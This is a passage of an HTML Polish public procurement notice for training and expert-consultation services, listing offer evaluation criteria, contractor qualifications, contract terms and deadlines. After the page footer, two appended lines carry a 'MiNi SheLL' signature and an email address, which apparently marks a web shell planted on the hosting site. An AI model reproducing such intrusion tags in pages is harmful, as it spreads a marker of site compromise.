szkoleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Kryterium cena (brutto) - 60 punktówWartość punktowa w kryterium cena = cena najniższa / cena oferty badanej x 60.2)	Kryterium wykazanie doświadczenia osoby skierowanej do realizacji zamówienia w ilości przeprowadzonych godzin szkoleniowych/wykładowych – 20 punktówW ramach kryterium wykazanie przez Wykonawcę doświadczenia osoby przeprowadzającej szkolenie tj. Wykładowcy w ilości przeprowadzonych godzin szkoleniowych/wykładowych. Zamawiający przyzna punkty za przeprowadzoną przez Wykonawcę/Wykładowcę liczbę godzin szkoleniowych/wykładowych z tematyki zgodnej z przedmiotem zamówienia.Punkty będą przyznawane według poniższych przedziałów:0 pkt - wykazanie doświadczenia za przeprowadzenie poniżej 50 godzin szkoleń/wykładów z tematyki zgodnej z przedmiotem zamówienia w ciągu ostatnich dwóch lat od dnia upublicznienia niniejszego postępowania10 pkt. – wykazanie doświadczenia za przeprowadzenie od 50 do 100 godzin szkoleń/wykładów z tematyki zgodnej z przedmiotem zamówienia w ciągu ostatnich dwóch lat od dnia upublicznienia niniejszego postępowania20 pkt. - wykazanie doświadczenia za przeprowadzenie od 101 i więcej godzin szkoleń/wykładów z tematyki zgodnej z przedmiotem zamówienia w ciągu ostatnich dwóch lat od dnia upublicznienia niniejszego postępowaniaPunkty za kryterium „wykazanie doświadczenia osoby skierowanej do realizacji zamówienia zostaną przyznane na podstawie oświadczenia będącego integralną częścią formularza ofertowego3)	Kryterium wykazanie doświadczenia osoby skierowanej do realizacji zamówienia w ilości lat pracy na stanowisku wykładowcy akademickiego – 10 punktówPunkty będą przyznawane według poniższych przedziałów:0 pkt – wykazanie doświadczenia w ilości lat pracy na stanowisku wykładowcy akademickiego poniżej dwóch lat,10 pkt. – wykazanie doświadczenia w ilości lat pracy na stanowisku wykładowcy akademickiego nie mniej niż dwa lata.Punkty za kryterium „wykazanie doświadczenia osoby skierowanej do realizacji zamówienia zostaną przyznane na podstawie oświadczenia będącego integralną częścią formularza ofertowego4)	Kryterium - Aspekt społeczny - 10 pkt.Delegowanie do wykonania usługi osób znajdujących się w szczególnej sytuacji na rynku pracy(od 0-10pkt).Punkty za kryterium „Aspekt społeczny” zostaną przyznane na podstawie oświadczenia będącego integralną częścią formularza ofertowego, które zawiera informacje czy i w jaki sposób przy realizacji zamówienia będą stosowane klauzule społeczne,(tj. m.in. osoby z niepełnosprawnościami, osoby w wieku 50 lat i więcej, osoby o niskich kwalifikacjach, tj. z wykształceniem ponadgimnazjalnym i niższym, osoby długotrwale bezrobotne, matki samotnie wychowujące dzieci, osoby sprawujące opiekę lub powracające na rynek pracy po okresie sprawowania opieki).Brak zaangażowanie na umowę o pracę osoby znajdującej się w szczególnej sytuacji na rynku pracy-0 pktZaangażowanie na umowę o pracę 1-ej osoby znajdującej się w szczególnej sytuacji na rynku pracy-3 pktZaangażowanie na umowę o pracę 2-óch osób znajdującej się w szczególnej sytuacji na rynku pracy-6 pktZaangażowanie na umowę o pracę 3-ech i więcej osób znajdującej się w szczególnej sytuacji na rynku pracy- 10 punktówPunkty za poszczególne kryteria zostaną zsumowane wg wzoru:C + D +W+ Ka suma punktów stanowić będzie końcową ocenę danej oferty. gdzie: C – punkty przyznane w kryterium „Cena”, D – punkty przyznane w kryterium „Doświadczenia w ilości przeprowadzonych godzin szkoleniowych/wykładowych”,W – punkty przyznane w kryterium „Doświadczenia w ilości lat pracy na stanowisku wykładowcy akademickiego”K - punkty przyznane w kryterium „Aspekt społeczny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2)	Kryterium wykazanie doświadczenia osoby skierowanej do realizacji zamówienia w ilości przeprowadzonych godzin szkoleniowych/wykładowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">3)	Kryterium wykazanie doświadczenia osoby skierowanej do realizacji zamówienia w ilości lat pracy na stanowisku wykładowcy akademickiego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">aspekt społeczny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> 1)	Kryterium cena (brutto) - 60 punktówWartość punktowa w kryterium cena = cena najniższa / cena oferty badanej x 60.2)	Kryterium wykazanie doświadczenia osoby skierowanej do realizacji zamówienia w ilości przeprowadzonych godzin szkoleniowych/wykładowych – 20 punktówW ramach kryterium wykazanie przez Wykonawcę doświadczenia osoby przeprowadzającej szkolenie tj. Wykładowcy w ilości przeprowadzonych godzin szkoleniowych/wykładowych. Zamawiający przyzna punkty za przeprowadzoną przez Wykonawcę/Wykładowcę liczbę godzin szkoleniowych/wykładowych z tematyki zgodnej z przedmiotem zamówienia.Punkty będą przyznawane według poniższych przedziałów:0 pkt - wykazanie doświadczenia za przeprowadzenie poniżej 50 godzin szkoleń/wykładów z tematyki zgodnej z przedmiotem zamówienia w ciągu ostatnich dwóch lat od dnia upublicznienia niniejszego postępowania10 pkt. – wykazanie doświadczenia za przeprowadzenie od 50 do 100 godzin szkoleń/wykładów z tematyki zgodnej z przedmiotem zamówienia w ciągu ostatnich dwóch lat od dnia upublicznienia niniejszego postępowania20 pkt. - wykazanie doświadczenia za przeprowadzenie od 101 i więcej godzin szkoleń/wykładów z tematyki zgodnej z przedmiotem zamówienia w ciągu ostatnich dwóch lat od dnia upublicznienia niniejszego postępowaniaPunkty za kryterium „wykazanie doświadczenia osoby skierowanej do realizacji zamówienia zostaną przyznane na podstawie oświadczenia będącego integralną częścią formularza ofertowego3)	Kryterium wykazanie doświadczenia osoby skierowanej do realizacji zamówienia w ilości lat pracy na stanowisku wykładowcy akademickiego – 10 punktówPunkty będą przyznawane według poniższych przedziałów:0 pkt – wykazanie doświadczenia w ilości lat pracy na stanowisku wykładowcy akademickiego poniżej dwóch lat,10 pkt. – wykazanie doświadczenia w ilości lat pracy na stanowisku wykładowcy akademickiego nie mniej niż dwa lata.Punkty za kryterium „wykazanie doświadczenia osoby skierowanej do realizacji zamówienia zostaną przyznane na podstawie oświadczenia będącego integralną częścią formularza ofertowego4)	Kryterium - Aspekt społeczny - 10 pkt.Delegowanie do wykonania usługi osób znajdujących się w szczególnej sytuacji na rynku pracy(od 0-10pkt).Punkty za kryterium „Aspekt społeczny” zostaną przyznane na podstawie oświadczenia będącego integralną częścią formularza ofertowego, które zawiera informacje czy i w jaki sposób przy realizacji zamówienia będą stosowane klauzule społeczne,(tj. m.in. osoby z niepełnosprawnościami, osoby w wieku 50 lat i więcej, osoby o niskich kwalifikacjach, tj. z wykształceniem ponadgimnazjalnym i niższym, osoby długotrwale bezrobotne, matki samotnie wychowujące dzieci, osoby sprawujące opiekę lub powracające na rynek pracy po okresie sprawowania opieki).Brak zaangażowanie na umowę o pracę osoby znajdującej się w szczególnej sytuacji na rynku pracy-0 pktZaangażowanie na umowę o pracę 1-ej osoby znajdującej się w szczególnej sytuacji na rynku pracy-3 pktZaangażowanie na umowę o pracę 2-óch osób znajdującej się w szczególnej sytuacji na rynku pracy-6 pktZaangażowanie na umowę o pracę 3-ech i więcej osób znajdującej się w szczególnej sytuacji na rynku pracy- 10 punktówPunkty za poszczególne kryteria zostaną zsumowane wg wzoru:C + D +W+ Ka suma punktów stanowić będzie końcową ocenę danej oferty. gdzie: C – punkty przyznane w kryterium „Cena”, D – punkty przyznane w kryterium „Doświadczenia w ilości przeprowadzonych godzin szkoleniowych/wykładowych”,W – punkty przyznane w kryterium „Doświadczenia w ilości lat pracy na stanowisku wykładowcy akademickiego”K - punkty przyznane w kryterium „Aspekt społeczny <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> udzielanie konsultacji eksperckich </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium cena (brutto) - 50 punktówWartość punktowa w kryterium cena = cena najniższa / cena oferty badanej x 50.2)	Kryterium ilość lat doświadczenia osoby skierowanej do realizacji zamówienia w przekazywaniu wiedzy, na poziomie studiów magisterskich – 20 punktów. Ilość lat doświadczenia Eksperta w przekazywaniu wiedzy, na poziomie studiów magisterskich:0 pkt- doświadczenie poniżej pięciu lat,10 pkt- doświadczenie: nie mniej niż pięcioletnie,15 pkt- doświadczenie: nie mniej niż dziesięcioletnie,20 pkt- doświadczenie: nie mniej niż piętnastoletnie.Punkty za kryterium „wykazanie doświadczenia osoby skierowanej do realizacji zamówienia zostaną przyznane na podstawie oświadczenia będącego integralną częścią formularza ofertowego3)	Kryterium ilość lat doświadczenia osoby skierowanej do realizacji zamówienia w zarządzaniu udokumentowane pracą na stanowisku kierowniczym – 20 punktówKryterium dotyczy doświadczenia Eksperta, w zarządzaniu na stanowisku kierowniczym.Ilość lat doświadczenia na stanowisku kierowniczym:0 pkt- doświadczenie poniżej pięciu lat,10 pkt - doświadczenie: nie mniej niż pięcioletnie,15 pkt - doświadczenie: nie mniej niż dziesięcioletnie,20 pkt - doświadczenie: nie mniej niż piętnastoletnie.Punkty za kryterium „wykazanie doświadczenia osoby skierowanej do realizacji zamówienia zostaną przyznane na podstawie oświadczenia będącego integralną częścią formularza ofertowego4)	Kryterium - Aspekt społeczny - 10 pkt.Delegowanie do wykonania usługi osób znajdujących się w szczególnej sytuacji na rynku pracy(od 0-10pkt).Punkty za kryterium „Aspekt społeczny” zostaną przyznane na podstawie oświadczenia będącego integralną częścią formularza ofertowego, które zawiera informacje czy i w jaki sposób przy realizacji zamówienia będą stosowane klauzule społeczne,(tj. m.in. osoby z niepełnosprawnościami, osoby w wieku 50 lat i więcej, osoby o niskich kwalifikacjach, tj. z wykształceniem ponadgimnazjalnym i niższym, osoby długotrwale bezrobotne, matki samotnie wychowujące dzieci, osoby sprawujące opiekę lub powracające na rynek pracy po okresie sprawowania opieki).Spełnienie aspektu społecznego oznacza zaangażowanie na umowę o pracę min.1 osoby spełniającej w/w warunki.Brak zaangażowanie na umowę o pracę osoby znajdującej się w szczególnej sytuacji na rynku pracy-0 pktZaangażowanie na umowę o pracę 1-ej osoby znajdującej się w szczególnej sytuacji na rynku pracy-3 pktZaangażowanie na umowę o pracę 2-óch osób znajdującej się w szczególnej sytuacji na rynku pracy-6 pktZaangażowanie na umowę o pracę 3-ech i więcej osób znajdującej się w szczególnej sytuacji na rynku pracy- 10 punktówPunkty za poszczególne kryteria zostaną zsumowane wg wzoru:C + D +Z+ Ka suma punktów stanowić będzie końcową ocenę danej oferty. gdzie: C – punkty przyznane w kryterium „Cena”, D – punkty przyznane w kryterium „Ilość lat doświadczenia w przekazywaniu wiedzy, na poziomie studiów magisterskich”,Z - punkty przyznane w kryterium „Ilość lat doświadczenia w zarządzaniu udokumentowane pracą na stanowisku kierowniczym”K - punkty przyznane w kryterium „Aspekt społeczny</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">ilość lat doświadczenia osoby skierowanej do realizacji zamówienia w przekazywaniu wiedzy, na poziomie studiów magisterskich</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">ilość lat doświadczenia osoby skierowanej do realizacji zamówienia w zarządzaniu udokumentowane pracą na stanowisku kierowniczym</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt społeczny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Kryterium cena (brutto) - 50 punktówWartość punktowa w kryterium cena = cena najniższa / cena oferty badanej x 50.2)	Kryterium ilość lat doświadczenia osoby skierowanej do realizacji zamówienia w przekazywaniu wiedzy, na poziomie studiów magisterskich – 20 punktów. Ilość lat doświadczenia Eksperta w przekazywaniu wiedzy, na poziomie studiów magisterskich:0 pkt- doświadczenie poniżej pięciu lat,10 pkt- doświadczenie: nie mniej niż pięcioletnie,15 pkt- doświadczenie: nie mniej niż dziesięcioletnie,20 pkt- doświadczenie: nie mniej niż piętnastoletnie.Punkty za kryterium „wykazanie doświadczenia osoby skierowanej do realizacji zamówienia zostaną przyznane na podstawie oświadczenia będącego integralną częścią formularza ofertowego3)	Kryterium ilość lat doświadczenia osoby skierowanej do realizacji zamówienia w zarządzaniu udokumentowane pracą na stanowisku kierowniczym – 20 punktówKryterium dotyczy doświadczenia Eksperta, w zarządzaniu na stanowisku kierowniczym.Ilość lat doświadczenia na stanowisku kierowniczym:0 pkt- doświadczenie poniżej pięciu lat,10 pkt - doświadczenie: nie mniej niż pięcioletnie,15 pkt - doświadczenie: nie mniej niż dziesięcioletnie,20 pkt - doświadczenie: nie mniej niż piętnastoletnie.Punkty za kryterium „wykazanie doświadczenia osoby skierowanej do realizacji zamówienia zostaną przyznane na podstawie oświadczenia będącego integralną częścią formularza ofertowego4)	Kryterium - Aspekt społeczny - 10 pkt.Delegowanie do wykonania usługi osób znajdujących się w szczególnej sytuacji na rynku pracy(od 0-10pkt).Punkty za kryterium „Aspekt społeczny” zostaną przyznane na podstawie oświadczenia będącego integralną częścią formularza ofertowego, które zawiera informacje czy i w jaki sposób przy realizacji zamówienia będą stosowane klauzule społeczne,(tj. m.in. osoby z niepełnosprawnościami, osoby w wieku 50 lat i więcej, osoby o niskich kwalifikacjach, tj. z wykształceniem ponadgimnazjalnym i niższym, osoby długotrwale bezrobotne, matki samotnie wychowujące dzieci, osoby sprawujące opiekę lub powracające na rynek pracy po okresie sprawowania opieki).Spełnienie aspektu społecznego oznacza zaangażowanie na umowę o pracę min.1 osoby spełniającej w/w warunki.Brak zaangażowanie na umowę o pracę osoby znajdującej się w szczególnej sytuacji na rynku pracy-0 pktZaangażowanie na umowę o pracę 1-ej osoby znajdującej się w szczególnej sytuacji na rynku pracy-3 pktZaangażowanie na umowę o pracę 2-óch osób znajdującej się w szczególnej sytuacji na rynku pracy-6 pktZaangażowanie na umowę o pracę 3-ech i więcej osób znajdującej się w szczególnej sytuacji na rynku pracy- 10 punktówPunkty za poszczególne kryteria zostaną zsumowane wg wzoru:C + D +Z+ Ka suma punktów stanowić będzie końcową ocenę danej oferty. gdzie: C – punkty przyznane w kryterium „Cena”, D – punkty przyznane w kryterium „Ilość lat doświadczenia w przekazywaniu wiedzy, na poziomie studiów magisterskich”,Z - punkty przyznane w kryterium „Ilość lat doświadczenia w zarządzaniu udokumentowane pracą na stanowisku kierowniczym”K - punkty przyznane w kryterium „Aspekt społeczny <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Z postępowania o udzielenie zamówienia wyklucza się, z zastrzeżeniem art. 110 ust. 2 ustawy Pzp, Wykonawcę w stosunku, do którego zachodzi którakolwiek z okoliczności, o których mowa w art. 108 ustawy Pzp, tj. Wykonawcę.1.	O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy spełniają następujące warunki dotyczące:1)	zdolności do występowania w obrocie gospodarczym: Zamawiający nie określa warunku w ww. zakresie.2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie określa warunku w ww. zakresie.3)	sytuacji ekonomicznej lub finansowej: Zamawiający nie określa warunku w ww. zakresie.4)	zdolności technicznej lub zawodowej: Zamawiający określa następujące warunki:a)	w Części 1: Wykonawca wykaże Minimum 1 osobę ,która wykaże się doświadczeniem osoby przeprowadzającej szkolenie tj. Wykładowcy w ilości przeprowadzonych godzin szkoleniowych/wykładowych z tematyki zgodnej z przedmiotem zamówienia w ciągu ostatnich dwóch lat od dnia upublicznienia niniejszego postępowania-(minimum 45 godzin).Wykładowca powinien posiadać niezbędną wiedzę i doświadczenie do wykonania zamówienia, posiadać wykształcenie wyższe, certyfikaty, zaświadczenia, umożliwiające przeprowadzenie szkolenia z tematyki zgodnej z przedmiotem zamówienia.b)	w Części 2; Wykonawca wykaże Minimum 1 osobę , która wykaże się doświadczeniem osoby przeprowadzającej szkolenie tj. Wykładowcy w ilości przeprowadzonych godzin szkoleniowych/wykładowych z tematyki zgodnej z przedmiotem zamówienia w ciągu ostatnich dwóch lat od dnia upublicznienia niniejszego postępowania(minimum 45 godzin)oraz doświadczenia osoby skierowanej do realizacji zamówienia w ilości lat pracy na stanowisku wykładowcy akademickiego (co najmniej 20 miesiące ) (Wykładowca powinien posiadać niezbędną wiedzę i doświadczenie do wykonania zamówienia, posiadać wykształcenie wyższe, certyfikaty, zaświadczenia, umożliwiające przeprowadzenie szkolenia z tematyki zgodnej z przedmiotem zamówienia,.c)	w Części 3: Wykonawca wykaże minimum j osobę, która wykaże się doświadczeniem Eksperta w przekazywaniu wiedzy, na poziomie studiów magisterskich (co najmniej 4 letnim), oraz doświadczeniem w zarządzaniu udokumentowane pracą na stanowisku kierowniczym(co najmniej 4 letnim). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz ofertowy, którego wzór stanowi Załącznik nr 2 do SWZ.Do oferty należy dołączyć:1)	Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;2)	Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;3)	Oświadczenie Wykonawcy o niepodleganiu wykluczenia z postępowania. Wzór oświadczenia o niepodleganiu wykluczeniu stanowi Załącznik nr 3 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepodleganiu wykluczeniu składa każdy z Wykonawców. 4)	Oświadczenie o spełnianiu warunków w postępowaniu. Wzór oświadczenia o spełnianiu warunków stanowi Załącznik nr 4 do SWZ.5)	Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, na zasadach określonych w art. 118 ustawy, przedstawia zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów według wzoru z Załącznika nr 5 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.2.	W przypadku wspólnego ubiegania się o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:1)	oświadczenia o których mowa w Rozdziale 14 ust.8 pkt 3) i 4) SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie, a oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji;6.1. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykazując warunek udziału w postępowaniu mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane usługi, do realizacji których te zdolności są wymagane. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy, a oświadczenie to jest podmiotowym środkiem dowodowym i należy je złożyć według wymogów Załącznika nr 5 do SWZ; 2)	zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt. 8.3 SWZ, przy czym podmiotowe środki dowodowe:a)	W celu potwierdzenia spełniania warunków udziału w postępowaniu: składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku;b)	W celu potwierdzenia braku podstaw do wykluczenia z udziału w postępowaniu składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.4.	Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwości wprowadzenia zmian do zawartej umowy, na podstawie art.454-455 ustawy Pzp oraz postanowień Projektu Umowy. 1.	Wszelkie zmiany niniejszej umowy wymagają formy pisemnej w postaci aneksu pod rygorem nieważności. 2.	Wykonawca może powierzyć wykonanie Przedmiotu umowy innej osobie niż wskazana w złożonej ofercie tylko po uprzednim uzyskaniu pisemnej zgody Zamawiającego oraz pod warunkiem, że zastępca spełnia wymagania minimalne określone przez Zamawiającego w załączniku nr 1 Szczegółowy Opis Przedmiotu Zamówienia w postępowaniu, w wyniku rozstrzygnięcia którego zawarto niniejszą umowę oraz uzyskałby co najmniej taką samą ocenę co osoba zastępowana w ramach kryteriów oceny ofert dotyczących doświadczenia i wykształcenia osoby pierwotnie wskazanej do realizacji zamówienia <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-05-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla wykonawcówna miniPortalu, w szczegółach danego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-05-07 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-06-05</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca może powierzyć wykonanie części zamówienia podwykonawcom. Zamawiającywymaga, aby w przypadku powierzenia części zamówienia podwykonawcom, Wykonawcawskazał w szablonie „Oferty Wykonawcy” części zamówienia, których wykonanie zamierzapowierzyć podwykonawcom, oraz podał (o ile są mu wiadome na tym etapie) nazwy (firmy) tychpodwykonawców. Zamawiający nie będzie badał czy wobec podwykonawcy nie będącegopodmiotem udostępniającym zasoby zachodzą podstawy wykluczenia w zakresie analogicznymjak ustalone w niniejszym postępowaniu w odniesieniu do Wykonawcy</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-04-28 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com